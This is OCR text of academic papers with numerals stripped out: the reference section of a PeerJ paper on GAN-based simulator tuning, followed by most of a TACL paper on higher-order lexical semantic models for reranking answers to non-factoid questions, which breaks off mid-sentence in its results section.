performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • tatiana gaintseva analyzed the data, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. • andrey ustyuzhanin analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: the code for the experiments is available at https://github.com/hse-lambda/rapid- ao/. borisyak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://github.com/hse-lambda/rapid-ao/ https://github.com/hse-lambda/rapid-ao/ http://dx.doi.org/ . /peerj-cs. references allison j, amako k, apostolakis j, arce p, asai m, aso t, bagli e, bagulya a, banerjee s, barrand g, beck b, bogdanov a, brandt d, brown j, burkhardt h, canal p, cano-ott d, chauvie s, cho k, cirrone g, cooperman g, corts-giraldo m, cosmo g, cuttone g, depaola g, desorgher l, dong x, dotti a, elvira v, folger g, francis z, galoyan a, garnier l, gayer m, genser k, grichine v, guatelli s, guye p, gumplinger p, howard a, hivnov i, hwang s, incerti s, ivanchenko a, ivanchenko v, jones f, jun s, kaitaniemi p, karakatsanis n, karamitros m, kelsey m, kimura a, koi t, kurashige h, lechner a, lee s, longo f, maire m, mancusi d, mantero a, mendoza e, morgan b, murakami k, nikitina t, pandola l, paprocki p, perl j, petrovi i, pia m, pokorski w, quesada j, raine m, reis m, ribon a, fira ar, romano f, russo g, santin g, sasaki t, sawkey d, shin j, strakovsky i, taborda a, tanaka s, tom b, toshito t, tran h, truscott p, urban l, uzhinsky v, verbeke j, verderi m, wendt b, wenzel h, wright d, wright d, yamashita t, yarba j, yoshida h. . recent developments in geant . nuclear instruments and methods in physics research section a: accelerators, spectrometers, detectors and associated equipment : – doi . /j.nima. . . . arjovsky m, chintala s, bottou l. . wasserstein gan. arxiv preprint. arxiv: . . baydin ag, shao l, bhimji w, heinrich l, naderiparizi s, munk a, liu j, gram- hansen b, louppe g, meadows l, torr p, lee v, cranmer k, prabhat m, wood f. . efficient probabilistic inference in the quest for physics beyond the standard model. in: advances in neural information processing systems. – . bellemare mg, danihelka i, dabney w, mohamed s, lakshminarayanan b, hoyer s, munos r. . the cramer distance as a solution to biased wasserstein gradients. arxiv preprint. arxiv: . . choi y, choi m, kim m, ha j-w, kim s, choo j. . stargan: unified generative adversarial networks for multi-domain image-to-image translation. in: ieee/cvf conference on computer vision and pattern recognition. – . dumoulin v, belghazi i, poole b, mastropietro o, lamb a, arjovsky m, courville a. . adversarially learned inference. arxiv preprint. arxiv: . . friedman jh. . greedy function approximation: a gradient boosting machine. annals of statistics ( ): – . goodfellow i, pouget-abadie j, mirza m, xu b, warde-farley d, ozair s, courville a, bengio y. . generative adversarial nets. in: advances in neural information processing systems. – . gulrajani i, ahmed f, arjovsky m, dumoulin v, courville ac. . improved training of wasserstein gans. in: advances in neural information processing systems. – . hossain s, jamali k, li y, rudzicz f. . chaingan: a sequential approach to gans. arxiv preprint. arxiv: . . ilten p, williams m, yang y. . event generator tuning using bayesian optimization. journal of instrumentation ( ):article p doi . / - / / /p . borisyak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.nima. . . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://dx.doi.org/ . / - / / /p http://dx.doi.org/ . /peerj-cs. isola p, zhu j-y, zhou t, efros aa. . image-to-image translation with conditional adversarial networks. in: proceedings of the ieee conference on computer vision and pattern recognition. – . karras t, aila t, laine s, lehtinen j. . progressive growing of gans for improved quality, stability, and variation. arxiv preprint. arxiv: . . kingma dp, ba j. . adam: a method for stochastic optimization. arxiv preprint. arxiv: . . kodali n, abernethy j, hays j, kira z. . on convergence and stability of gans. arxiv preprint. arxiv: . . li j, madry a, peebles j, schmidt l. . towards understanding the dynamics of generative adversarial networks. arxiv preprint. arxiv: . . liu h, simonyan k, yang y. . darts: differentiable architecture search. arxiv preprint. arxiv: . . louppe g, hermans j, cranmer k. . adversarial variational optimization of non- differentiable simulators. arxiv preprint. arxiv: . . mescheder l, geiger a, nowozin s. . which training methods for gans do actually converge? in: international conference on machine learning. – . metz l, poole b, pfau d, sohl-dickstein j. . unrolled generative adversarial networks. in: iclr. mockus j. . bayesian approach to global optimization: theory and applications. vol. . dordrecht: springer science & business media. prokhorenkova l, gusev g, vorobev a, dorogush av, gulin a. . catboost: unbiased boosting with categorical features. in: advances in neural information processing systems. – . radford a, metz l, chintala s. . unsupervised representation learning with deep convolutional generative adversarial networks. arxiv preprint. arxiv: . . roth k, lucchi a, nowozin s, hofmann t. . stabilizing training of generative adversarial networks through regularization. advances in neural information pro- cessing systems. – available at https://papers.nips.cc/paper/ -stabilizing- training-of-generative-adversarial-networks-through-regularization.pdf . simonyan k, zisserman a. . very deep convolutional networks for large-scale image recognition. arxiv preprint. arxiv: . . sjöstrand t, ask s, christiansen jr, corke r, desai n, ilten p, mrenna s, prestel s, rasmussen co, skands pz. . an introduction to pythia . . computer physics communications : – . sjöstrand t, mrenna s, skands p. . pythia . physics and manual. journal of high energy physics ( ):article . skands p, carrazza s, rojo j. . tuning pythia . : the monash tune. the eu- ropean physical journal c ( ):article doi . /epjc/s - - -y. sønderby ck, caballero j, theis l, shi w, huszár f. . amortised map inference for image super-resolution. arxiv preprint. arxiv: . . sønderby ck, caballero j, theis l, shi w, huszár f. . amortised map inference for image super-resolution. arxiv preprint. arxiv: . . borisyak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . https://papers.nips.cc/paper/ -stabilizing-training-of-generative-adversarial-networks-through-regularization.pdf https://papers.nips.cc/paper/ -stabilizing-training-of-generative-adversarial-networks-through-regularization.pdf http://arxiv.org/abs/ . http://dx.doi.org/ . /epjc/s - - -y http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://dx.doi.org/ . /peerj-cs. srivastava n, hinton g, krizhevsky a, sutskever i, salakhutdinov r. . dropout: a simple way to prevent neural networks from overfitting. the journal of machine learning research ( ): – . the atlas collaboration. . the atlas simulation infrastructure. european physi- cal journal c: particles and fields ( ): – doi . /epjc/s - - - . wierstra d, schaul t, glasmachers t, sun y, peters j, schmidhuber j. . natural evolution strategies. the journal of machine learning research ( ): – . borisyak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /epjc/s - - - http://dx.doi.org/ . /peerj-cs. higher-order lexical semantic models for non-factoid answer reranking daniel fried , peter jansen , gustave hahn-powell , mihai surdeanu , and peter clark university of arizona, tucson, az, usa allen institute for artificial intelligence, seattle, wa, usa {dfried,pajansen,hahnpowell,msurdeanu}@email.arizona.edu peterc@allenai.org abstract lexical semantic models provide robust performance for question answering, but, in general, can only capitalize on direct ev- idence seen during training. for example, monolingual alignment models acquire term alignment probabilities from semi- structured data such as question-answer pairs; neural network language models learn term embeddings from unstructured text. all this knowledge is then used to estimate the semantic similarity between question and answer candidates. we in- troduce a higher-order formalism that al- lows all these lexical semantic models to chain direct evidence to construct indirect associations between question and answer texts, by casting the task as the traversal of graphs that encode direct term associa- tions. using a corpus of , questions from yahoo! answers, we experimentally demonstrate that higher-order methods are broadly applicable to alignment and lan- guage models, across both word and syn- tactic representations. we show that an important criterion for success is control- ling for the semantic drift that accumu- lates during graph traversal. all in all, the proposed higher-order approach improves five out of the six lexical semantic mod- els investigated, with relative gains of up to + % over their first-order variants. introduction open-domain question answering (qa), which finds short textual answers to natural language questions, is often viewed as the successor to key- word search (etzioni, ) and one of the most difficult and widely applicable end-user applica- tions of natural language processing (nlp). from syntactic parsing, discourse processing, and lex- ical semantics, qa necessitates a level of func- tionality across a variety of topics that make it a natural, yet challenging, proving ground for many aspects of nlp. here, we address a partic- ularly challenging qa subtask: open-domain non- factoid qa, where queries take the form of com- plex questions (e.g., manner or how questions), and answers range from single sentences to en- tire paragraphs. because this task is so complex and large in scope, current state-of-the-art open- domain systems perform at only about % p@ , or answering roughly one out of three questions correctly (jansen et al., ). in this paper we focus on answer ranking (ar), a key component of non-factoid qa that focuses on ordering candidate answers based on the like- lihood that they capture the information needed to answer a question. unlike keyword search, berger ( ) observed that lexical matching methods are generally insufficient for qa, where questions and answers often have little to no lexical overlap (as in the case of where should we go for breakfast? and zoe’s diner has great pancakes). previous work has shown that lexical semantics (ls) mod- els are well suited to bridging this “lexical chasm”, and at least two flavors of lexical semantics have been successfully applied to qa. the first treats qa as a monolingual alignment problem, learning associations between words (or other structures) that appear in question-answer pairs (surdeanu et al., ; yao et al., ). the second computes the semantic similarity between question and an- swer using language models acquired from rele- vant texts (yih et al., ; jansen et al., ). here we argue that while these models begin to bridge the “lexical chasm”, many still suffer from sparsity and only capitalize on direct evi- dence. returning to our example question, if we also train on the qa pair what goes well with pan- cakes? and hashbrowns and toast, we can use the transactions of the association for computational linguistics, vol. , pp. – , . action editor: sharon goldwater. submission batch: / ; revision batch / ; published / . c© association for computational linguistics. distributed under a cc-by-nc-sa . license. figure : a hypothetical graph derived from a lexical se- mantic alignment model. indirect association between breakfast – pancakes and pancakes – hashbrowns to locate additional answers for where to visit for breakfast, including regee’s has the best hashbrowns in town. we can represent ls models as a graph, as in figure . for a word-based alignment model, the graph nodes represent individual words, and the (directed) edges capture the likelihood of a word wa appearing in a gold answer given word wq in the question. grounding this in our example, w may represent breakfast, w pancakes, and w hashbrowns. for a language model, the edges cap- ture the similarity of contexts between the words in the nodes. for both alignment and language model graphs, we observe that semantic associa- tion between two words (or structures) stored in the nodes can be determined by investigating the different paths that connect these two nodes, even when they are not directly connected. we call this class of models higher-order lexical models, in contrast to the first-order lexical mod- els introduced in previous work, which rely only on direct evidence to estimate association strength. for example, all alignment models in previous work can estimate p(wq|wa), i.e., the probabil- ity of generating the question word wq if the an- swer contains the word wa, only if this pair has been seen at least once in training. on the other hand, our approach can estimate p(wq|wa) from indirect evidence, e.g., from chaining two distinct question/answer pairs that contain the words (wq, wi) and (wi, wa), respectively. the contributions of this work are: . this is the first work to our knowledge that proposes higher-order ls models for qa. we show that an important criterion for success is controlling for the semantic drift that ac- cumulates in the graph traversal paths, which plagues traditional random walk algorithms. for example, we empirically demonstrate that paths up to a length of three are gener- ally beneficial, but longer paths hurt or do not improve performance. . we show that a variety of ls models and representations, including alignment and lan- guage models, over both words and syntac- tic structures, can be adapted to the proposed higher-order formalism. in this latter respect we introduce a novel syntax-based variant of the neural network language model (nnlm) of mikolov et al. ( ) that models syntac- tic dependencies rather than words, which al- lows it to capture knowledge that is comple- mentary to that of word-based nnlms. . the training process for alignment models requires a large corpus of qa pairs. due to these resource requirements, we evaluate our higher-order ls models on a commu- nity question answering (cqa) task (wang et al., ; jansen et al., ) across thousands of how questions, and show that most higher-order models perform signifi- cantly better than their first-order variants. . we demonstrate that language models and alignment models capture complementary in- formation, and can be combined to improve the performance of the cqa system for man- ner questions. related work we focus on statistical ls methods for open- domain qa, in particular cqa tasks, such as the ones driven by yahoo! answers datasets (wang et al., ; jansen et al., ). berger et al. ( ) were the first to propose a statistical ls model to “bridge the lexical chasm” between questions and answers for a qa task. building off this work, a number of ls models us- ing either words or other syntactic and semantic structures have been proposed for qa (echihabi and marcu, ; soricut and brill, ; rie- zler et al., ; surdeanu et al., ; yao et al., ; jansen et al., ), or related tasks, such as semantic textual similarity (sultan et al., ). however, all of these models fall into the class of first-order models. to our knowledge, this work is the first to investigate higher-order ls models for qa, which can take advantage of indirect ev- idence, i.e., the “neighbors of neighbors” in the association graph. second-order lexical models have recently been brought to bear on a variety of other nlp tasks. zapirain et al. ( ) use a second-order model based on distributional similarity (lin, ) to improve a selectional preference model, and lee et al. ( ) use a similar approach for coreference resolution. our work expands on these ideas with models of arbitrary order, an approach to control semantic drift, and an application to qa. this work falls under the larger umbrella of algorithms for graph-based inference, which have been successfully applied to other nlp and information retrieval problems, such as rela- tion extraction (chakrabarti and agarwal, ; chakrabarti, ; lao and cohen, ), in- ference over knowledge bases (lao et al., ), name disambiguation (minkov et al., ), and search (bhalotia et al., ; tong et al., ). while many of these approaches use random walk algorithms, in pilot experiments we observed that random walks, such as pagerank (pr) (page et al., ), tend to accumulate semantic drift from the originating node because they consider all possi- ble paths in the graph. this semantic drift reduces the quality of the higher-order associations, which impacts qa performance. here we implement a conservative graph traversal algorithm, similar in spirit to the “cautious bootstrapping” algorithm of yarowsky (whitney and sarkar, ; yarowsky, ). by constraining the traversal paths, our al- gorithm runs two orders of magnitude faster than pr, while controlling for semantic drift. approach the architecture of our proposed qa framework is illustrated in figure . here we evaluate both first- order and higher-order ls models in the context of community question answering (cqa), using a large dataset of qa pairs from yahoo! answers . we use a standard cqa evaluation task (jansen et al., ), where one must rank a set of user- generated answers to a given question, such that the community-selected best answer appears in the top position. more specifically, for a given question, the candidate retrieval (cr) component fetches all its community-generated answers from the answer collection, and gives each answer can- didate an initial ranking using shallow informa- http://answers.yahoo.com figure : architecture of the reranking framework for qa, showing a reranking component that incorporates two classes of lexical semantic models (alignment and neural network language models), implemented over two representations of content (words and syntax). tion retrieval scoring. these answer candidates are then passed on to the answer reranking com- ponent, the focus of this work. the answer reranking (ar) component ana- lyzes the answer candidates using more expensive techniques to extract first-order and higher-order ls features, and these features are then used in concert with a learning framework to rerank the candidates and elevate correct answers to higher positions. for the learning framework, we use svmrank, a variant of support vector machines for structured output adapted to ranking prob- lems. in addition to these features, each reranker also includes a single feature containing the score of each candidate, as computed by the above can- didate retrieval component. first-order lexical models we next introduce a series of first-order ls mod- els, which serve as the foundation for the higher- order models discussed in the next section. . neural network language models inspired by previous work (yih et al., ; jansen et al., ), we adapt the word vec nnlm of we used the same scoring as jansen et al. ( ): co- sine similarity between the question and candidate answer’s lemma vector representations, with lemmas weighted using tf.idf (ch. , (manning et al., )). http://www.cs.cornell.edu/people/tj/ svm_light/svm_rank.html including these scores as features in the reranker model is a common strategy that ensures that the reranker takes ad- vantage of the analysis already performed by the cr model. http://answers.yahoo.com http://www.cs.cornell.edu/people/tj/svm_light/svm_rank.html http://www.cs.cornell.edu/people/tj/svm_light/svm_rank.html mikolov et al. ( ) to this qa task. in particu- lar, we use their skip-gram model with hierarchi- cal sampling. this model predicts the context of a word given the word itself, and through this pro- cess embeds words into a latent conceptual space with a fixed number of dimensions. consequently, related words tend to have vector representations that are close to each other in this space. this type of predictive algorithm has been found to perform considerably better than count-based approaches to distributional similarity on a variety of seman- tic tasks (baroni et al., ). we derive four ls measures from these vec- tors, which are then are included as features in the reranker. the first is a measure of the over- all similarity of the question and answer candi- date, which is computed as the cosine similarity between two composite vectors. these composite vectors are assembled by summing the vectors for individual question (or answer candidate) words, and re-normalizing this composite vector to unit length. in addition to this overall similarity score, we compute the pairwise similarities between each word in the question and answer candidates, and include as features the average, minimum, and maximum pairwise similarities. . alignment models berger et al. ( ) showed that learning question- to-answer transformations using a statistical ma- chine translation (smt) model begins to “bridge the lexical chasm” between questions and an- swers. we build upon this observation, using the ibm model (brown et al., ) variant of sur- deanu et al. ( ) to determine the probability that a question q is a translation of an answer a, p(q|a): p(q|a) = ∏ q∈q p(q|a) ( ) p(q|a) = ( −λ)pml(q|a) + λpml(q|c) ( ) pml(q|a) = ∑ a∈a (t(q|a)pml(a|a)) ( ) where the probability that the question term q is generated from answer a, p(q|a), is smoothed using the prior probability that the term q is gen- erated from the entire collection of answers c, pml(q|c). pml(q|a) is computed as the sum of we also tried the multiplicative strategy for word-vector combination of levy and goldberg ( b), but it did not improve our results. the probabilities that the question term q is a trans- lation of any answer term a, t(q|a), weighted by the probability that a is generated from a. the translation table for t(q|a) is computed us- ing giza++ (och and ney, ). similar to surdeanu et al. ( ) we: (a) set pml(q|c) to a small value for out-of-vocabulary words; (b) modify the t(.|.) distributions to guar- antee that the probability of translating a word to itself, i.e., t(w|w), is highest (murdock and croft, ); and (c) tune the smoothing parameter λ on a development corpus. qa systems generally use the above model to determine the global alignment probability be- tween a given question and answer candidate, p(q|a). a novel contribution of our work is that we also use the alignment model’s proba- bility distributions (from a source word to des- tination words) as distributed representations for source words, based on the observation that words with similar alignment distributions are likely to have a similar meaning. formally, we denote the alignment vector representation for the ith word in the vocabulary as w(i), and define the jth en- try in the vector as w(i)j = t(wordj|wordi), where t(.|.) is the translation probability distri- bution from eq. . that is, the jth entry of the vector for word i is the conditional probability of seeing wordj in a question, given that wordi was seen in a corresponding answer. the vector for each word then represents a discrete (conditional) probability distribution. to compare two words, we use the square root of the jensen-shannon di- vergence (jsd) between their conditional distri- butions. let m(i,j) be the element-wise aver- age of the vectors w(i) and w(j), that is (w(i) + w(j))/ , and let k(w,v) be the kullback-leibler divergence between distributions (represented as vectors) w and v: k(w,v) = |v |∑ i= wi ln wi vi ( ) where |v | is the vocabulary size (and the dimen- sionality of w). then the distance between words i and j is j(w(i), w(j)) = √ k(w(i), m(i, j)) + k(w(j), m(i, j)) ( ) we use the square root of the jensen-shannon diver- gence, derived from kullback-leibler divergence, since it is a distance metric (in particular it is finite and symmetric). we derive four additional ls features from these alignment vector representations, which par- allel the features derived from the nnlm vec- tor representations (§ . ). the first is the jsd between the composite alignment vectors for the question and the answer candidate, where the composite is constructed by summing the vec- tors for individual question (or answer candidate) words, and dividing by the number of vectors summed. we also generate features from the av- erage, minimum, and maximum pairwise jsd between words in the question and words in the answer candidate. in practice, we have found that the addition of these four features considerably improves the performance of all alignment mod- els investigated for the qa task. . modeling syntactic structures surdeanu et al. ( ) demonstrated that align- ment models can readily capitalize on represen- tations other than words, including representa- tions of syntax. here we expand on their work and explore three syntactic variations of the align- ment and nnlm models. for these models we make use of collapsed syntactic dependencies with processed cc complements (de marneffe et al., ), extracted from the annotated english gi- gaword (napoles et al., ). the first model is a straightforward adaptation of the alignment model in § . , where the repre- sentations of questions and answers are changed from bags of words to “bags of syntactic depen- dencies” (surdeanu et al., ). that is, the terms to be aligned (q and a in eq. to ) become 〈head,label,dependent〉 dependencies, such as 〈eat,dobj,pancakes〉, rather than words. the motivation behind this change is that it allows the model to align simple propositions rather than words, which are a more accurate representation of the information encoded in the question. while tuning on the development set of questions we found that unlabeled dependencies, which ignore the middle term in the above tuples, performed better than labeled dependencies, possibly due to the sparsity of the labeled dependencies. as such, all our dependency alignment models use unla- beled dependencies. the second model adapts the idea of working with bags of syntactic dependencies, instead of bags of words, to nnlms, and builds an lm over dependencies rather than words. however, be- cause the nnlm embeddings are generated from context, we must find a consistent ordering of de- pendencies that maintains contextual information. here we order dependencies using a depth-first, left-to-right traversal of the dependency graph originating at the predicate or root node. fig- ure shows an example of such a traversal, which results in the following ordering (using unlabeled dependencies): ( ) be time time the time same be country country no be should be business business the business concealing concealing history history its figure : dfs l→r ordering of word pairs starting from the sentential root. the sentence is taken from ltw eng . of the english gigaword. the model uses the default word vec imple- mentation to compute the term embeddings. to our knowledge, this syntax-driven extension of nnlms is novel. during tuning we compared the labeled and unlabeled dependency representations against an nnlm model using traditional bigrams (where words are paired based on their linear order, i.e., without any syntactic motivation). again, we found that unlabeled dependencies outperformed surface bigrams and labeled dependencies. lastly, we also evaluate the recent nnlm model proposed by levy and goldberg ( a), who modified the word vec embedding proce- dure to include context derived from dependen- cies, arguing that this embedding model encodes functional similarity better than mikolov et al.’s unigram surface structure model. it is important to note that while in our syntactic nnlm model the lm terms are (lexicalized unlabeled) syntactic dependency tuples, in levy and goldberg’s model the lm terms are still words, but the context is driven by syntax instead of surface structure. higher-order lexical models the first-order models we have just described make use of the direct evidence seen in training data to create associations between words (or de- pendencies). unfortunately this training data is often quite sparse, and while it may be possi- ble to exhaustively create training data with broad other ordering schemes were tested during development, but dfs proved to be the most stable across sentences. coverage for artificially narrow domains such as things to eat for breakfast, this quickly becomes intractable for larger domains. to mitigate this sparsity, here we propose a method that identifies associations that were not explicitly seen during training. returning to our example in § , had an alignment model learned the associations break- fast – pancakes and pancakes – hashbrowns, the model should be able to make use of the indi- rect association between breakfast – hashbrowns to further “bridge the lexical chasm”, and iden- tify answer candidates containing the word hash- browns to the question where is a good place to eat breakfast? at first glance, algorithms such as pager- ank (page et al., ) appear to offer an attractive and intuitive method to determine the association between arbitrary nodes in a weighted graph by modeling a random walk to convergence (from any given starting node). as we show in section , we have found that these methods quickly accumulate semantic drift (mcintosh, ), because: (a) they run to convergence, i.e., they traverse paths of ar- bitrary length, and (b) they explore the entire asso- ciation space encoded in the neighborhood graph, both of which introduce considerable noise. for example, by chaining even small numbers of di- rect associations, such as breakfast – pancakes, pancakes – hashbrowns, hashbrowns – potato, and potato – field, a model that does not control for se- mantic drift may be tempted to answer questions about breakfast venues with answers that discuss wheat fields or soccer fields. thus, keeping these indirect associations short and on-context is criti- cal for qa. based on the above observations, here we out- line a general method for creating higher-order lexical semantic models that incorporate simple measures to control for semantic drift, and demon- strate how to apply it to both alignment graph rep- resentations and the distributed vector space repre- sentations of a nnlm. our method relies on two general properties of the first-order ls models: (a) all models include a distributed representation for each term that is encoded as a vector (e.g., for nnlms this is a term’s embedding in vector space, and for alignment models this is a vector of alignment probabilities from a given answer term to all possible question terms), and (b) models de- henceforth we use “term” to indicate either a word or a dependency in a lexical semantics model. fine a pairwise function that assigns a lexical sim- ilarity score between pairs of directly connected terms (e.g., for nnlms this is the cosine similar- ity of the corresponding term embeddings, and for alignment models this is given directly by t(q|a), from equation ). intuitively, we incorporate indirect evidence in our models by averaging the distributed represen- tation of a term t with the distributed representa- tions of its neighbors, i.e., those terms with high- est lexical similarity to t. to control for seman- tic drift we consider: (a) only the k most similar neighbors to the current term, and (b) short paths in the association graph, e.g., neighbors of neigh- bors but no further. for example, for a second- order model, we construct this new vector repre- sentation for each node in the graph by averaging the vector of the node itself and the vectors of its k closest neighbors (weighted by each pair’s similar- ity), so that the vector representation of breakfast becomes a weighted sum of breakfast, morning, food, cereal, and so forth. by using only the clos- est neighbors, we exclude low associates of break- fast, such as spoon or vacation, which are only marginally related and therefore likely to generate semantic drift. formally, let w be the vector representation (ei- ther from an nnlm or alignment model) of a given term. we construct a higher-order represen- tation ŵ by linearly interpolating w with its top associates, those vectors with highest value of a pairwise scoring function s: ŵ(i) = ∑ j∈nk(w(i)) s(w(i),w(j)) w(j) ( ) where s is the function that measures the lexi- cal similarity between terms, and depends on the representations used (salign or scos, see below). nk(w(i)), the neighborhood of the vector w(i), denotes the indices of the k term vectors with highest values of s(w(i), ·), and k is a hyperpa- rameter that controls how many vectors are inter- polated. the resulting vectors are renormalized, as discussed later. it is important to note that this process of creating higher-order vectors can be trivially nk(w) includes w, because in all ls models proposed here, each term has maximal similarity with itself. the nor- malization applied after combining all vectors has the effect of modulating the contribution of the vector w in the higher order representation ŵ, based on how similar the other vec- tors in nk(w) are to w. iterated arbitrarily, constructing a second-order model from a first-order model, then a third-order model from a second, etc. intuitively, this models paths of increasing length in the association graph over terms. we now describe the concrete implementations of the procedure in the alignment and the nnlm settings. higher-order alignment: in the alignment set- ting, where the vector w(i) for term i contains the probabilities that the source (answer) term i is aligned with the destination (question) term j, we use salign(w(i),w(j)) = t(termj|termi) ( ) where t is the translation probability from equa- tion ( ). we normalize the ŵ vectors of equa- tion ( ) using the l norm, so that each contin- ues to represent a probability distribution. in- tuitively, the second-order alignment distribution ŵ(i) for source term i is a linear combination of term i’s most probable destination terms’ distri- butions, weighted by the destination probabilities from w(i). the higher-order models greatly reduce the sparsity of the first-order alignment graph. in a first-order word alignment model (i.e., using only direct evidence) trained on approximately , question/answer pairs (see § . ), source words align with an average of destination words with non-zero probability, out of a , word vocabulary. the second-order model aligns , destination words to each source word on average; the third-order model, , ; and the fourth-order model, , . in the results section, we observe that this sparsity reduction is only helpful up to a certain point; having too many associates for each word reduces performance on the qa task. higher-order nnlm: in the nnlm setting, we use the cosine similarity of vectors as interpolation weights and to choose the nearest neighbors: scos(w(i),w(j)) = w(i) ·w(j) ||w(i)|| ||w(j)|| ( ) we found that applying the softmax function to each term’s vector of k-highest scos similarities, to ensure all interpolation weights are positive and have a consistent range across terms, improved performance. as such, all higher-order nnlm models use this softmax normalization. the resulting interpolation can be conceptual- ized in several ways. viewing cosine similarity as a representation of entailment (beltagy et al., ), the higher-order nnlm model reflects multiple-hop inference on top of the correspond- ing association graph, similar to the higher-order alignment model. the interpolation could also be viewed as smoothing term representations in vector space, averaging each term’s vector with its nearest neighbors according to their cosine similarity. higher-order hybrid model: we also imple- ment a hybrid model, which interpolates the align- ment distribution vectors, but using the pairwise cosine similarities from the nnlm setting: ŵa(i) = ∑ j∈nk(wn(i)) scos(wn(i),wn(j)) wa(j) where wn(i) and wa(i) are respectively the nnlm vector and alignment vector representa- tions for term i, and scos is cosine similarity. in addition, we experimented with the opposite hy- brid model: interpolating the nnlm vectors us- ing alignment associate probabilities as weights, but found that it did not perform as well as using nnlm similarities to interpolate alignment vec- tors. our conjecture is that the higher order tech- nique can be viewed as a method of reducing spar- sity (either in the vectors or in the context used to create them), and since the nnlm vectors trained on words (as opposed to dependencies) are less sparse, they benefit less from this technique. experiments . data to test the utility of our approach, we experi- mented with the qa scenario introduced in § using the subset of yahoo! answers corpus in- troduced by jansen et al. ( ) . yahoo! an- swers is an open domain community-generated qa site, with questions and answers that span for- mal and precise to informal and ambiguous lan- guage. this corpus contains , qa pairs from a corpus of how questions. each question contains at least four community-generated answers, one of which was voted as the top answer. the number of answers to each question ranged from to over , http://nlp.sista.arizona.edu/ releases/acl http://answers.yahoo.com http://nlp.sista.arizona.edu/releases/acl http://nlp.sista.arizona.edu/releases/acl http://answers.yahoo.com with the average . % of qa pairs were used for training, % for development, and % for test. the following additional resources were used: nnlm corpus: we generated vector represen- tations for words using the word vec model of mikolov et al. ( ), using the skip-gram architecture with hierarchical sampling. vec- tors are trained using the entire gigaword cor- pus of approximately g words. we used - dimensional vectors (jansen et al., ). alignment corpus: we use a separate partition of qa pairs to train an alignment model between questions and top answers. this corpus of , qa pairs does not overlap with the collection of , pairs used for the training, development, and testing partitions, but was chosen according to the same criteria. the alignment model was trained using giza++ over five iterations of ibm model . . tuning the following hyperparameters were tuned inde- pendently to maximize p@ on the development partition of the yahoo! answers dataset: number of vectors interpolated: we investi- gated the effects of varying k in eq. , i.e., the number of most-similar neighbor vectors interpo- lated when constructing a higher-order model. we experimented with values of k ranging from to and found that the value does not substantially affect results across the second-order word align- ment models. since vectors used in the higher- order interpolation are weighted by their similar- ity to a vector w, this is likely due to a swift de- crease in values of the pairwise similarity function, s(w, ·), beyond the vectors closest to w. we chose to use k = because it comes from a stabler maximum, and it is sufficiently small to make con- struction of higher-order models feasible in terms of time and memory usage. base representation type: we compared the effects of using either words or lemmas as the base lexical unit for the ls models, and found that words achieved higher p@ scores in both the alignment and nnlm models on the develop- ment dataset. as such, all results reported here use words for the syntax-independent models, and tu- ples of words for the syntax-driven models. content filtering: we investigated using part- of-speech (pos) tags to filter the content consid- ldc catalog number ldc t ered by the lexical similarity models, by excluding certain non-informative classes of words such as determiners. using pos tags generated by stan- ford’s corenlp (manning et al., ), we fil- tered content to only include nouns, adjectives, verbs, and adverbs for the word-based models, and tuples where both words have one of these four pos tags for the syntax-based models. we found that this increased p@ scores for all word- based alignment and nnlm models (including the levy-goldberg (l-g) model ), but did not improve performance for models that used depen- dency representations. results reported in the remainder of this paper use this pos filtering for all word-based alignment and nnlm models (in- cluding l-g’s) as well as the dependency align- ment model, but not for our dependency nnlm model. . baselines we compare against five baseline models: random: selects an answer randomly; cr: uses the ranking provided by our shallow an- swer candidate retrieval (cr) component; jansen et al. ( ): the best-performing lexi- cal semantic model reported in jansen et al. ( ) (row in their table ). pru: pagerank (page et al., ) with uni- form teleportation probabilities, constructed over the word alignment graph. let a be the row- stochastic transition matrix of this graph, where the ith row of a is the vector w(i) (see § . ). fol- lowing the pr algorithm, we add small “teleporta- tion” probabilities from a teleportation matrix t to the alignment matrix, producing a pagerank we modified the l-g algorithm to ignore any dependen- cies not matching this filtering criterion when building the context for a word. we hypothesize that our filtering criterion for dependen- cies, which requires both head and modifiers to have one of the four pos tags, was too aggressive. we will explore other filtering criteria in future work. although filtered dependencies yielded slightly lower re- sults in our tuning experiments, we use them in the depen- dency alignment experiments because the unfiltered third- order dependency alignment model was too large to fit into memory. we do not report the performance of their discourse- based models, because these models use additional resources making them incompatible with the work shown here. we construct the teleportation matrix t by setting each row of t to be a uniform probability distribution, i.e., each entry in a row of t is /|v |, where |v | is the vocabulary size. matrix p = α∗a + ( −α) ∗t . following pre- vious work (page et al., ), we used α = . . then, we compute the matrix products p ,p , ..., using rows in these products as vector representa- tions for terms. thus, the ith row of pk gives the conditional probabilities of arriving at each term in the graph after k transitions beginning at term i. prp: personalized pagerank (agirre and soroa, ). this method follows the same algorithm as pru, but uses nnlm similarities of terms to de- fine non-uniform teleportation probabilities (fol- lowing the intuition that teleportation likelihood should be correlated with semantic similarity of terms). in particular, we obtain the ith row of t by computing the pairwise cosine similarities of term i’s nnlm vector with every other term’s vector, and taking the softmax of these similarities to produce a probability distribution, v(i). to ac- count for missing terms (due to the difference in the alignment and nnlm corpora) we smooth all teleportation probabilities by adding a small value, �, to each entry of v(i). the renormalized v(i) then becomes the ith row of t . . results analysis of higher-order models table shows the performance of first-order and higher-order alignment and nnlm models across representation type. rows in the table are labeled with the orders of the representations used. w in- dicates a model where the base units are words, while d indicates a model where the base units are dependencies; a denotes an alignment model, while n denotes an nnlm model. distinct fea- tures are generated for each order representation (§§ . , . , ) and used in the svm model. for example, wn( - ) uses features constructed from the st, nd, and rd order representations of the word-based nnlm. combining multiple orders into a single feature space is important, as each or- der captures different information. for example, the top five closest associates for the term dog un- der wn( ) are: puppy, cat, dogs, 